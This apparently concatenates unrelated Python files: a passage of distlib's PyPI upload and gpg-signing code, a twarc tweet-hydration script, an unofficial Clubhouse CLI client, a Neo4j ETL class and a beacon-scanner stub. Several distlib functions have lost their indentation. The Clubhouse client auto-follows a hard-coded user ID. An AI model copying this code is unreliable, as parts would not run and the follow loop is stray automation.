except OSError:
pass
    def _get_pypirc_command(self):
        """
        Get the distutils command for interacting with PyPI configurations.
        :return: the command.
        """
        # Imported lazily to avoid a hard dependency at module import time.
        from .util import _get_pypirc_command as cmd

        return cmd()
    def read_configuration(self):
        """
        Read the PyPI access configuration as supported by distutils. This populates
        ``username``, ``password``, ``realm`` and ``url`` attributes from the
        configuration.
        """
        from .util import _load_pypirc

        cfg = _load_pypirc(self)
        # Missing keys leave username/password as None; realm and url fall
        # back to "pypi" and the current URL respectively.
        self.username = cfg.get("username")
        self.password = cfg.get("password")
        self.realm = cfg.get("realm", "pypi")
        self.url = cfg.get("repository", self.url)
    def save_configuration(self):
        """
        Save the PyPI access configuration. You must have set ``username`` and
        ``password`` attributes before calling this method.
        """
        # Raises if credentials are unset before anything is written.
        self.check_credentials()
        from .util import _store_pypirc

        _store_pypirc(self)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException("username and password must be set")
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[":action"] = "verify"
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[":action"] = "submit"
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode("utf-8").rstrip()
outbuf.append(s)
logger.debug("%s: %s" % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password, keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, "--status-fd", "2", "--no-tty"]
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(["--homedir", keystore])
if sign_password is not None:
cmd.extend(["--batch", "--passphrase-fd", "0"])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + ".asc")
cmd.extend(
[
"--detach-sign",
"--armor",
"--local-user",
signer,
"--output",
sf,
filename,
]
)
logger.debug("invoking: %s", " ".join(cmd))
return cmd, sf
    def run_command(self, cmd, input_data=None):
        """
        Run a command in a child process , passing it any input data specified.

        :param cmd: The command to run.
        :param input_data: If specified, this must be a byte string containing
                           data to be sent to the child process.
        :return: A tuple consisting of the subprocess' exit code, a list of
                 lines read from the subprocess' ``stdout``, and a list of
                 lines read from the subprocess' ``stderr``.
        """
        kwargs = {
            "stdout": subprocess.PIPE,
            "stderr": subprocess.PIPE,
        }
        if input_data is not None:
            kwargs["stdin"] = subprocess.PIPE
        stdout = []
        stderr = []
        p = subprocess.Popen(cmd, **kwargs)
        # We don't use communicate() here because we may need to
        # get clever with interacting with the command
        # Drain stdout/stderr on separate threads so neither pipe can fill
        # and deadlock the child.
        t1 = Thread(target=self._reader, args=("stdout", p.stdout, stdout))
        t1.start()
        t2 = Thread(target=self._reader, args=("stderr", p.stderr, stderr))
        t2.start()
        if input_data is not None:
            p.stdin.write(input_data)
            p.stdin.close()
        p.wait()
        t1.join()
        t2.join()
        return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
    """
    Sign a file.

    :param filename: The pathname to the file to be signed.
    :param signer: The identifier of the signer of the file.
    :param sign_password: The passphrase for the signer's
                          private key used for signing.
    :param keystore: The path to a directory which contains the keys
                     used in signing. If not specified, the instance's
                     ``gpg_home`` attribute is used instead.
    :return: The absolute pathname of the file where the signature is
             stored.
    """
    command, sig_file = self.get_sign_command(
        filename, signer, sign_password, keystore
    )
    # The passphrase is fed to gpg on its stdin (--passphrase-fd 0).
    exit_code, _, _ = self.run_command(command, sign_password.encode("utf-8"))
    if exit_code != 0:
        raise DistlibException("sign command failed with error code %s" % exit_code)
    return sig_file
def upload_file(
    self,
    metadata,
    filename,
    signer=None,
    sign_password=None,
    filetype="sdist",
    pyversion="source",
    keystore=None,
):
    """
    Upload a release file to the index.

    :param metadata: A :class:`Metadata` instance defining at least a name
                     and version number for the file to be uploaded.
    :param filename: The pathname of the file to be uploaded.
    :param signer: The identifier of the signer of the file.
    :param sign_password: The passphrase for the signer's
                          private key used for signing.
    :param filetype: The type of the file being uploaded. This is the
                     distutils command which produced that file, e.g.
                     ``sdist`` or ``bdist_wheel``.
    :param pyversion: The version of Python which the release relates
                      to. For code compatible with any Python, this would
                      be ``source``, otherwise it would be e.g. ``3.2``.
    :param keystore: The path to a directory which contains the keys
                     used in signing. If not specified, the instance's
                     ``gpg_home`` attribute is used instead.
    :return: The HTTP response received from PyPI upon submission of the
             request.
    """
    self.check_credentials()
    if not os.path.exists(filename):
        raise DistlibException("not found: %s" % filename)
    metadata.validate()
    d = metadata.todict()
    sig_file = None
    if signer:
        if not self.gpg:
            # Signing was requested but no gpg executable is configured;
            # proceed unsigned rather than failing the upload.
            logger.warning("no signing program available - not signed")
        else:
            sig_file = self.sign_file(filename, signer, sign_password, keystore)
    with open(filename, "rb") as f:
        file_data = f.read()
    # Both digests are sent so the index can verify with either algorithm.
    md5_digest = hashlib.md5(file_data).hexdigest()
    sha256_digest = hashlib.sha256(file_data).hexdigest()
    d.update(
        {
            ":action": "file_upload",
            "protocol_version": "1",
            "filetype": filetype,
            "pyversion": pyversion,
            "md5_digest": md5_digest,
            "sha256_digest": sha256_digest,
        }
    )
    files = [("content", os.path.basename(filename), file_data)]
    if sig_file:
        with open(sig_file, "rb") as f:
            sig_data = f.read()
        files.append(("gpg_signature", os.path.basename(sig_file), sig_data))
        # The signature lives in a temporary directory created by the sign
        # command helper; remove it now that its contents have been read.
        shutil.rmtree(os.path.dirname(sig_file))
    request = self.encode_request(d.items(), files)
    return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
    """
    Upload documentation to the index.

    :param metadata: A :class:`Metadata` instance defining at least a name
                     and version number for the documentation to be
                     uploaded.
    :param doc_dir: The pathname of the directory which contains the
                    documentation. This should be the directory that
                    contains the ``index.html`` for the documentation.
    :return: The HTTP response received from PyPI upon submission of the
             request.
    """
    self.check_credentials()
    if not os.path.isdir(doc_dir):
        raise DistlibException("not a directory: %r" % doc_dir)
    index_page = os.path.join(doc_dir, "index.html")
    if not os.path.exists(index_page):
        raise DistlibException("not found: %r" % index_page)
    metadata.validate()
    name = metadata.name
    version = metadata.version
    # The whole documentation tree is zipped in memory and posted as the
    # "content" file of a doc_upload form.
    zipped = zip_dir(doc_dir).getvalue()
    form_fields = [
        (":action", "doc_upload"),
        ("name", name),
        ("version", version),
    ]
    form_files = [("content", name, zipped)]
    return self.send_request(self.encode_request(form_fields, form_files))
def get_verify_command(self, signature_filename, data_filename, keystore=None):
    """
    Return a suitable command for verifying a file.

    :param signature_filename: The pathname to the file containing the
                               signature.
    :param data_filename: The pathname to the file containing the
                          signed data.
    :param keystore: The path to a directory which contains the keys
                     used in verification. If not specified, the
                     instance's ``gpg_home`` attribute is used instead.
    :return: The verifying command as a list suitable to be
             passed to :class:`subprocess.Popen`.
    """
    # Resolve the keystore first, then assemble the gpg invocation.
    if keystore is None:
        keystore = self.gpg_home
    cmd = [self.gpg, "--status-fd", "2", "--no-tty"]
    if keystore:
        cmd += ["--homedir", keystore]
    cmd += ["--verify", signature_filename, data_filename]
    logger.debug("invoking: %s", " ".join(cmd))
    return cmd
def verify_signature(self, signature_filename, data_filename, keystore=None):
    """
    Verify a signature for a file.

    :param signature_filename: The pathname to the file containing the
                               signature.
    :param data_filename: The pathname to the file containing the
                          signed data.
    :param keystore: The path to a directory which contains the keys
                     used in verification. If not specified, the
                     instance's ``gpg_home`` attribute is used instead.
    :return: True if the signature was verified, else False.
    """
    if not self.gpg:
        raise DistlibException("verification unavailable because gpg unavailable")
    command = self.get_verify_command(signature_filename, data_filename, keystore)
    exit_code, _, _ = self.run_command(command)
    # gpg exits 0 for a good signature and 1 for a bad one; anything else
    # indicates the command itself failed.
    if exit_code not in (0, 1):
        raise DistlibException("verify command failed with error code %s" % exit_code)
    return exit_code == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
    """
    This is a convenience method for downloading a file from an URL.
    Normally, this will be a file from the index, though currently
    no check is made for this (i.e. a file can be downloaded from
    anywhere).

    The method is just like the :func:`urlretrieve` function in the
    standard library, except that it allows digest computation to be
    done during download and checking that the downloaded data
    matched any expected value.

    :param url: The URL of the file to be downloaded (assumed to be
                available via an HTTP GET request).
    :param destfile: The pathname where the downloaded file is to be
                     saved.
    :param digest: If specified, this must be a (hasher, value)
                   tuple, where hasher is the algorithm used (e.g.
                   ``'md5'``) and ``value`` is the expected value. A bare
                   value may also be passed, in which case the hasher
                   defaults to ``'md5'``.
    :param reporthook: The same as for :func:`urlretrieve` in the
                       standard library.
    """
    if digest is None:
        digester = None
        logger.debug("No digest specified")
    else:
        if isinstance(digest, (list, tuple)):
            hasher, digest = digest
        else:
            # A bare digest value was passed: assume MD5.
            hasher = "md5"
        digester = getattr(hashlib, hasher)()
        logger.debug("Digest specified: %s" % digest)
    # The following code is equivalent to urlretrieve.
    # We need to do it this way so that we can compute the
    # digest of the file as we go.
    with open(destfile, "wb") as dfp:
        # addinfourl is not a context manager on 2.x
        # so we have to use try/finally
        sfp = self.send_request(Request(url))
        try:
            headers = sfp.info()
            blocksize = 8192
            size = -1
            read = 0
            blocknum = 0
            if "content-length" in headers:
                size = int(headers["Content-Length"])
            if reporthook:
                # Initial call, before any data has arrived.
                reporthook(blocknum, blocksize, size)
            while True:
                block = sfp.read(blocksize)
                if not block:
                    break
                read += len(block)
                dfp.write(block)
                if digester:
                    # Digest computed incrementally, block by block.
                    digester.update(block)
                blocknum += 1
                if reporthook:
                    reporthook(blocknum, blocksize, size)
        finally:
            sfp.close()

    # check that we got the whole file, if we can
    if size >= 0 and read < size:
        raise DistlibException(
            "retrieval incomplete: got only %d out of %d bytes" % (read, size)
        )
    # if we have a digest, it must match.
    if digester:
        actual = digester.hexdigest()
        if digest != actual:
            raise DistlibException(
                "%s digest mismatch for %s: expected "
                "%s, got %s" % (hasher, destfile, digest, actual)
            )
        logger.debug("Digest verified: %s", digest)
def send_request(self, req):
    """
    Send a standard library :class:`Request` to PyPI and return its
    response.

    :param req: The request to send.
    :return: The HTTP response from PyPI (a standard library HTTPResponse).
    """
    # Install the optional auth / SSL-verification handlers, when set.
    extra_handlers = [
        handler
        for handler in (self.password_handler, self.ssl_verifier)
        if handler
    ]
    opener = build_opener(*extra_handlers)
    return opener.open(req)
def encode_request(self, fields, files):
    """
    Encode fields and files for posting to an HTTP server.

    :param fields: The fields to send as a list of (fieldname, value)
                   tuples.
    :param files: The files to send as a list of (fieldname, filename,
                  file_bytes) tuple.
    """
    # Adapted from packaging, which in turn was adapted from
    # http://code.activestate.com/recipes/146306
    boundary = self.boundary
    divider = b"--" + boundary
    parts = []
    for field_name, values in fields:
        # A scalar value is wrapped in a one-element list so that repeated
        # fields can be sent as multiple form parts.
        if not isinstance(values, (list, tuple)):
            values = [values]
        for value in values:
            parts.append(divider)
            parts.append(
                ('Content-Disposition: form-data; name="%s"' % field_name).encode(
                    "utf-8"
                )
            )
            parts.append(b"")
            parts.append(value.encode("utf-8"))
    for field_name, filename, file_bytes in files:
        parts.append(divider)
        parts.append(
            (
                'Content-Disposition: form-data; name="%s"; filename="%s"'
                % (field_name, filename)
            ).encode("utf-8")
        )
        parts.append(b"")
        parts.append(file_bytes)
    # Closing boundary plus a trailing CRLF.
    parts.append(divider + b"--")
    parts.append(b"")
    body = b"\r\n".join(parts)
    headers = {
        "Content-type": b"multipart/form-data; boundary=" + boundary,
        "Content-length": str(len(body)),
    }
    return Request(self.url, body, headers)
def search(self, terms, operator=None):
    """Search the index via its XML-RPC interface.

    A bare string is interpreted as a name search; otherwise ``terms``
    is passed through as-is. ``operator`` defaults to ``"and"``.
    """
    query = {"name": terms} if isinstance(terms, string_types) else terms
    rpc_proxy = ServerProxy(self.url, timeout=3.0)
    try:
        return rpc_proxy.search(query, operator or "and")
    finally:
        # Explicitly close the proxy's underlying transport connection.
        rpc_proxy("close")()
|
my_hydrated.py | from twarc import Twarc
import json
from pathlib import Path
import os
import gzip
import time
from tqdm import tqdm
from multiprocessing import Process, SimpleQueue
from utils import load_configs
def hydrate(cfs):
    """Spawn the id-file producer plus one hydration worker per account.

    :param cfs: list of config dicts; each must contain an ``account``
                mapping of Twarc credentials (passed to ``hydrated_cycle``).
    """
    jobs = []
    squeue = SimpleQueue()
    data_dirs = ['2020-01', '2020-02', '2020-03', '2020-04']
    # create folder here to avoid data racing (done once in the parent
    # process, before any worker starts).
    os.makedirs('hydrated', exist_ok=True)
    for data_dir in data_dirs:
        full = os.path.join('hydrated', data_dir)
        print(full)
        os.makedirs(full, exist_ok=True)
    # Producer: enqueues id-file paths plus one "done" sentinel per worker.
    fc_process = Process(target=file_creator, args=(squeue, len(cfs),))
    jobs.append(fc_process)
    fc_process.daemon = True
    fc_process.start()
    for cf in cfs:
        # unpack keys
        account = cf['account']
        p = Process(target=hydrated_cycle, args=(account, squeue,))
        jobs.append(p)
        p.daemon = True
        p.start()
    # Plain loop rather than a throwaway list comprehension: join() is
    # called purely for its side effect.
    for job in jobs:
        job.join()
def file_creator(squeue, n_workers):
    """Enqueue every .txt id-file path, then one 'done' marker per worker."""
    for month_dir in ('2020-01', '2020-02', '2020-03', '2020-04'):
        for entry in Path("COVID-19-TweetIDs/" + month_dir).iterdir():
            if entry.name.endswith(".txt"):
                rel_path = os.path.join(month_dir, entry.name)
                print("inserting:", rel_path)
                squeue.put(rel_path)
    # One sentinel per consumer so every worker can terminate.
    for _ in range(n_workers):
        squeue.put("done")
def hydrated_cycle(account, squeue):
    """Worker loop: hydrate queued id files until the 'done' sentinel.

    :param account: Twarc credential kwargs for this worker.
    :param squeue: queue of relative id-file paths produced by file_creator.
    """
    twarc = Twarc(**account)
    while True:
        working_path = squeue.get()
        if working_path == "done":
            print('job done')
            # BUGFIX: the original fell through here and tried to hydrate
            # the "done" sentinel itself, so workers never terminated
            # cleanly; return ends the worker.
            return
        gzip_path = os.path.join(
            "hydrated/",
            working_path.split("/")[0],
            working_path.split("/")[-1][:-4] + ".jsonl.gz")
        print(gzip_path)
        hydrate_file(working_path, twarc, gzip_path)
def hydrate_file(id_file, twarc, gzip_path):
    """Hydrate tweet ids from COVID-19-TweetIDs/<id_file> into a gzip file.

    Only tweets whose ``place.country_code`` strips to 'AU' are written,
    one JSON document per line. If ``gzip_path`` already exists the file
    is treated as cached work and skipped.
    """
    print("hydrating ", id_file)
    # getting use the cached work
    if os.path.isfile(gzip_path):
        print("skipping jsonl file already exists: ", gzip_path)
        return
    # BUGFIX: the id file is now closed via a context manager (it was
    # previously opened inline and leaked). Opening it before the gzip
    # also avoids leaving an empty output file behind - which would be
    # mistaken for cached work - if the id file is missing.
    with open("COVID-19-TweetIDs/" + id_file) as id_handle, \
            gzip.open(gzip_path, 'w') as output:
        for tweet in twarc.hydrate(id_handle):
            place = tweet['place']
            # NOTE(review): assumes place["country_code"] is a str whenever
            # place is truthy - confirm against the Twitter payload.
            if place and place["country_code"].strip() == 'AU':
                print(place["country_code"], gzip_path)
                output.write(json.dumps(tweet).encode('utf-8') + b"\n")
def _reader_generator(reader):
b = reader(1024 * 1024)
while b:
yield b
b = reader(1024 * 1024)
if __name__ == "__main__":
    # Load per-account Twarc credentials and start the hydration pipeline.
    cfs = load_configs()
    hydrate(cfs)
|
newcli5.py | """
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
import time
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
    import agorartc

    # Voice support is optional: when the Agora SDK import fails, RTC is
    # left as None and the client runs without audio.
    RTC = agorartc.createRtcEngineBridge()
    eventHandler = agorartc.RtcEngineEventHandlerBase()
    RTC.initEventHandler(eventHandler)
    # 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
    RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
    # Enhance voice quality
    if RTC.setAudioProfile(
            agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
            agorartc.AUDIO_SCENARIO_GAME_STREAMING
    ) < 0:
        print("[-] Failed to set the high quality audio profile")
except ImportError:
    RTC = None
def set_interval(interval):
    """ (int) -> decorator
    set_interval decorator

    Wraps a function so that calling it starts a daemon thread which
    re-invokes the function every ``interval`` seconds until either the
    function returns a falsy value or the returned ``threading.Event``
    is set.
    """
    import functools

    def decorator(func):
        @functools.wraps(func)  # preserve the wrapped function's metadata
        def wrap(*args, **kwargs):
            stopped = threading.Event()

            def loop():
                # Event.wait(interval) doubles as the sleep: it returns
                # True (ending the loop) once stopped.set() is called.
                while not stopped.wait(interval):
                    ret = func(*args, **kwargs)
                    if not ret:
                        break

            thread = threading.Thread(target=loop)
            thread.daemon = True
            thread.start()
            return stopped
        return wrap
    return decorator
def write_config(user_id, user_token, user_device, filename='setting.ini'):
    """ (str, str, str, str) -> bool
    Write Config. return True on successful file write

    Persists the credentials into the [Account] section of ``filename``.
    """
    parser = configparser.ConfigParser()
    parser["Account"] = {
        "user_device": user_device,
        "user_id": user_id,
        "user_token": user_token,
    }
    with open(filename, 'w') as handle:
        parser.write(handle)
    return True
def read_config(filename='setting.ini'):
    """ (str) -> dict of str
    Read Config

    Returns the [Account] section as a plain dict, or an empty dict when
    the file or the section is missing.
    """
    parser = configparser.ConfigParser()
    parser.read(filename)
    try:
        return dict(parser['Account'])
    except KeyError:
        return dict()
def process_onboarding(client):
    """ (Clubhouse) -> NoneType
    This is to process the initial setup for the first time user.

    Loops until a legal name / username pair passes local validation and
    is accepted by the server.
    """
    print("=" * 30)
    print("Welcome to Clubhouse!\n")
    print("The registration is not yet complete.")
    print("Finish the process by entering your legal name and your username.")
    print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
    print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
    print("=" * 30)
    while True:
        user_realname = input("[.] Enter your legal name (John Smith): ")
        user_username = input("[.] Enter your username (elonmusk1234): ")
        # Local validation first, before any API call is made.
        user_realname_split = user_realname.split(" ")
        if len(user_realname_split) != 2:
            print("[-] Please enter your legal name properly.")
            continue
        if not (user_realname_split[0].isalpha() and
                user_realname_split[1].isalpha()):
            print("[-] Your legal name is supposed to be written in alphabets only.")
            continue
        if len(user_username) > 16:
            print("[-] Your username exceeds above 16 characters.")
            continue
        if not user_username.isalnum():
            print("[-] Your username is supposed to be in alphanumerics only.")
            continue
        # Server-side updates; retry the whole loop on any failure.
        client.update_name(user_realname)
        result = client.update_username(user_username)
        if not result['success']:
            print(f"[-] You failed to update your username. ({result})")
            continue
        result = client.check_waitlist_status()
        if not result['success']:
            print("[-] Your registration failed.")
            print(f" It's better to sign up from a real device. ({result})")
            continue
        print("[-] Registration Complete!")
        print(" Try registering by real device if this process pops again.")
        break
def print_channel_list(client, max_limit=200):
    """ (Clubhouse) -> NoneType
    Print list of channels

    NOTE(review): the body currently issues follow() calls against a
    hard-coded user id and prints an empty table (the row-building code is
    commented out) - this looks like leftover debugging; confirm intent
    before relying on it. ``max_limit`` is currently unused.
    """
    # Get channels and print out
    console = Console()
    table = Table(show_header=True, header_style="bold magenta")
    table.add_column("")
    table.add_column("channel_name", style="cyan", justify="right")
    table.add_column("topic")
    table.add_column("speaker_count")
    ids = "14710025"
    for id in ids.split(","):
        channels = client.follow(user_id=id)
        # Pause between follow calls (presumably to avoid rate limiting).
        time.sleep(5)
        ##channels = client.search_users(query="Aatman shah")
        print(channels)
    channels = client.follow_multiple(ids)
    print(channels)
    # i = 0
    # for channel in channels:
    #     i += 1
    #     # if i > max_limit:
    #     #     break
    #     _option = ""
    #     _option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
    #     table.add_row(
    #         str(_option),
    #         str(channel['name']),
    #         str(channel['description']))
    console.print(table)
def chat_main(client):
    """ (Clubhouse) -> NoneType
    Main function for chat

    Repeatedly prompts for a channel, joins it, shows its users, keeps the
    session alive with a ping timer, and (optionally) registers a hotkey
    to request speaker permission.
    """
    max_limit = 200
    channel_speaker_permission = False
    _wait_func = None
    _ping_func = None

    def _request_speaker_permission(client, channel_name, user_id):
        """ (str) -> bool
        Raise hands for permissions
        """
        # BUGFIX: without ``nonlocal`` the assignment below created a new
        # local variable, so the cleanup code at the bottom of chat_main
        # could never cancel this timer.
        nonlocal _wait_func
        if not channel_speaker_permission:
            client.audience_reply(channel_name, True, False)
            _wait_func = _wait_speaker_permission(client, channel_name, user_id)
            print("[/] You've raised your hand. Wait for the moderator to give you the permission.")

    @set_interval(30)
    def _ping_keep_alive(client, channel_name):
        """ (str) -> bool
        Continue to ping alive every 30 seconds.
        """
        client.active_ping(channel_name)
        return True

    @set_interval(10)
    def _wait_speaker_permission(client, channel_name, user_id):
        """ (str) -> bool
        Function that runs when you've requested for a voice permission.
        """
        # Get some random users from the channel.
        _channel_info = client.get_channel(channel_name)
        if _channel_info['success']:
            for _user in _channel_info['users']:
                if _user['user_id'] != user_id:
                    user_id = _user['user_id']
                    break
            # Check if the moderator allowed your request.
            res_inv = client.accept_speaker_invite(channel_name, user_id)
            if res_inv['success']:
                print("[-] Now you have a speaker permission.")
                print(" Please re-join this channel to activate a permission.")
                return False
        return True

    while True:
        # Choose which channel to enter.
        # Join the talk on success.
        user_id = client.HEADERS.get("CH-UserID")
        print_channel_list(client, max_limit)
        channel_name = input("[.] Enter channel_name: ")
        channel_info = client.join_channel(channel_name)
        if not channel_info['success']:
            # Check if this channel_name was taken from the link
            channel_info = client.join_channel(channel_name, "link", "e30=")
            if not channel_info['success']:
                print(f"[-] Error while joining the channel ({channel_info['error_message']})")
                continue

        # List currently available users (TOP 20 only.)
        # Also, check for the current user's speaker permission.
        channel_speaker_permission = False
        console = Console()
        table = Table(show_header=True, header_style="bold magenta")
        table.add_column("user_id", style="cyan", justify="right")
        table.add_column("username")
        table.add_column("name")
        table.add_column("is_speaker")
        table.add_column("is_moderator")
        users = channel_info['users']
        i = 0
        for user in users:
            i += 1
            if i > max_limit:
                break
            table.add_row(
                str(user['user_id']),
                str(user['name']),
                str(user['username']),
                str(user['is_speaker']),
                str(user['is_moderator']),
            )
            # Check if the user is the speaker
            if user['user_id'] == int(user_id):
                channel_speaker_permission = bool(user['is_speaker'])
        console.print(table)

        # Check for the voice level.
        if RTC:
            token = channel_info['token']
            RTC.joinChannel(token, channel_name, "", int(user_id))
        else:
            print("[!] Agora SDK is not installed.")
            print(" You may not speak or listen to the conversation.")

        # Activate pinging
        client.active_ping(channel_name)
        _ping_func = _ping_keep_alive(client, channel_name)
        _wait_func = None

        # Add raise_hands key bindings for speaker permission
        # Sorry for the bad quality
        if not channel_speaker_permission:
            if sys.platform == "darwin":  # OSX
                _hotkey = "9"
            elif sys.platform == "win32":  # Windows
                _hotkey = "ctrl+shift+h"
            else:
                # BUGFIX: other platforms (e.g. Linux) previously raised
                # NameError because _hotkey was never assigned.
                _hotkey = "ctrl+shift+h"
            print(f"[*] Press [{_hotkey}] to raise your hands for the speaker permission.")
            keyboard.add_hotkey(
                _hotkey,
                _request_speaker_permission,
                args=(client, channel_name, user_id)
            )

        input("[*] Press [Enter] to quit conversation.\n")
        keyboard.unhook_all()

        # Safely leave the channel upon quitting the channel.
        if _ping_func:
            _ping_func.set()
        if _wait_func:
            _wait_func.set()
        if RTC:
            RTC.leaveChannel()
        client.leave_channel(channel_name)
def user_authentication(client):
    """ (Clubhouse) -> NoneType
    Just for authenticating the user.

    Asks for a phone number, requests an SMS code, completes the auth
    handshake, and persists the credentials via write_config().
    """
    result = None
    while True:
        user_phone_number = input("[.] Please enter your phone number. (+818043217654) > ")
        result = client.start_phone_number_auth(user_phone_number)
        if not result['success']:
            print(f"[-] Error occured during authentication. ({result['error_message']})")
            continue
        break

    result = None
    while True:
        verification_code = input("[.] Please enter the SMS verification code (1234, 0000, ...) > ")
        result = client.complete_phone_number_auth(user_phone_number, verification_code)
        if not result['success']:
            print(f"[-] Error occured during authentication. ({result['error_message']})")
            continue
        break

    user_id = result['user_profile']['user_id']
    user_token = result['auth_token']
    user_device = client.HEADERS.get("CH-DeviceId")
    write_config(user_id, user_token, user_device)
    print("[.] Writing configuration file complete.")

    # Waitlisted accounts cannot proceed any further.
    if result['is_waitlisted']:
        print("[!] You're still on the waitlist. Find your friends to get yourself in.")
        return

    # Authenticate user first and start doing something
    client = Clubhouse(
        user_id=user_id,
        user_token=user_token,
        user_device=user_device
    )
    if result['is_onboarding']:
        process_onboarding(client)

    return
def main():
    """
    Initialize required configurations, start with some basic stuff.

    Reads cached credentials from setting.ini; if present, validates them
    and enters the chat loop, otherwise runs authentication and restarts.
    """
    # Initialize configuration
    client = None
    user_config = read_config()
    user_id = user_config.get('user_id')
    user_token = user_config.get('user_token')
    user_device = user_config.get('user_device')

    # Check if user is authenticated
    if user_id and user_token and user_device:
        client = Clubhouse(
            user_id=user_id,
            user_token=user_token,
            user_device=user_device
        )
        # Check if user is still on the waitlist
        _check = client.check_waitlist_status()
        if _check['is_waitlisted']:
            print("[!] You're still on the waitlist. Find your friends to get yourself in.")
            return
        # Check if user has not signed up yet.
        _check = client.me()
        if not _check['user_profile'].get("username"):
            process_onboarding(client)
        chat_main(client)
    else:
        client = Clubhouse()
        user_authentication(client)
        # Re-enter main() so the freshly written config is picked up.
        main()
if __name__ == "__main__":
    try:
        main()
    except Exception:
        # Remove Agora crash-dump files before exiting.
        file_list = os.listdir(".")
        for _file in file_list:
            if _file.endswith(".dmp"):
                os.remove(_file)
        # BUGFIX: the original swallowed the exception entirely, so any
        # failure exited silently; re-raise so the traceback is visible.
        raise
|
category_tag_etl.py | """CateogryTag ETL."""
import logging
import multiprocessing
from etl import ETL
from etl.helpers import ETLHelper
from files import JSONFile
from transactors import CSVTransactor
from transactors import Neo4jTransactor
class CategoryTagETL(ETL):
    """Category Tag ETL.

    Loads per-provider category-tag JSON and MERGEs each tag into Neo4j
    as a ``CategoryTag`` node.
    """

    logger = logging.getLogger(__name__)

    # Query templates which take params and will be processed later.
    # Parameters filled in by process_query_params: commit size, CSV file.
    tag_query_template = """
        USING PERIODIC COMMIT %s
        LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
        MERGE (e:CategoryTag {primaryKey: row.tag})
            ON CREATE SET e.tagName = row.tag,
                e.tagDefinition = row.definition
        """

    def __init__(self, config):
        """Initialise object."""
        super().__init__()
        self.data_type_config = config

    def _load_and_process_data(self):
        # One worker process per sub type; the ETL base class joins them.
        thread_pool = []
        for sub_type in self.data_type_config.get_sub_type_objects():
            process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
            process.start()
            thread_pool.append(process)
        ETL.wait_for_threads(thread_pool)

    def _process_sub_type(self, sub_type):
        """Load one provider's tag file and run its Neo4j batch load."""
        self.logger.info("Loading HTP Tag Data: %s", sub_type.get_data_provider())
        filepath = sub_type.get_filepath()
        data = JSONFile().get_data(filepath)
        self.logger.info("Finished Loading HTP Tag Data: %s", sub_type.get_data_provider())
        if data is None:
            self.logger.warning("No Data found for %s skipping", sub_type.get_data_provider())
            return
        ETLHelper.load_release_info(data, sub_type, self.logger)
        commit_size = self.data_type_config.get_neo4j_commit_size()
        # batch_size = self.data_type_config.get_neo4j_commit_size()
        data_provider = sub_type.get_data_provider()
        self.logger.info("subtype: " + data_provider)
        query_template_list = [
            [self.tag_query_template, commit_size,
             "tag_data_" + sub_type.get_data_provider() + ".csv"]
        ]
        generators = self.get_generators(data)
        query_and_file_list = self.process_query_params(query_template_list)
        CSVTransactor.save_file_static(generators, query_and_file_list)
        Neo4jTransactor.execute_query_batch(query_and_file_list)
        self.error_messages("CategoryTag-{}: ".format(sub_type.get_data_provider()))

    def get_generators(self, data):
        """Create Generator.

        Yields a single batch: a one-element list holding every tag row,
        shaped for the CSV transactor.
        """
        tag_maps = []
        for tag in data['data']:
            # NOTE(review): "name" duplicates "tag" and is not referenced
            # by tag_query_template - confirm whether it is still needed.
            tag_object = {"tag": tag.get('Category'),
                          "name": tag.get('Category'),
                          "definition": tag.get('Definition')}
            tag_maps.append(tag_object)
        yield [tag_maps]
|
docker_beacon_scan.py | """
CONFIG
"""
TIME_SCAN = 5
NAME_FILE_BEACON = "json_beacon_scan.json"
"""
Clases
"""
# https://github.com/bowdentheo/BLE-Beacon-Scanner
class Beacon_Obj(object):
    """Plain data holder for one scanned BLE beacon.

    The original version declared redundant class-level attributes
    (``mac = str()`` etc.); every field is assigned per-instance in
    ``__init__``, so those declarations have been removed.
    """

    def __init__(self, mac: str, rssi: int, uuid: str, tx: int, maj: int, min: int, tip: str, company: str):
        # NOTE(review): parameter ``min`` shadows the builtin; kept as-is
        # to preserve the keyword interface for existing callers.
        self.mac = mac
        self.rssi = rssi
        self.uuid = uuid
        self.tx_power = tx
        self.major = maj
        self.minor = min
        self.tipo = tip
        self.empresa = company

    def getJson(self):
        """Return the instance attributes as a plain dict."""
